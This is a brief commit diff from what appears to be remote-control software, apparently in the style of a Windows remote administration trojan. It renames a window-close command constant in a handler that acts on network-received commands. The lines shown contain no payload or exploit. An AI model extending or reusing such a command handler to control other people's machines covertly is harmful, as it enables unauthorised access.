Update private master program code
This commit is contained in:
@@ -179,7 +179,7 @@ VOID CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
|
||||
break;
|
||||
}
|
||||
|
||||
case COMMAND_WINDOW_CLOSE:
|
||||
case CMD_WINDOW_CLOSE:
|
||||
{
|
||||
HWND hWnd = *((HWND*)(szBuffer+1));
|
||||
|
||||
|
||||
Reference in New Issue
Block a user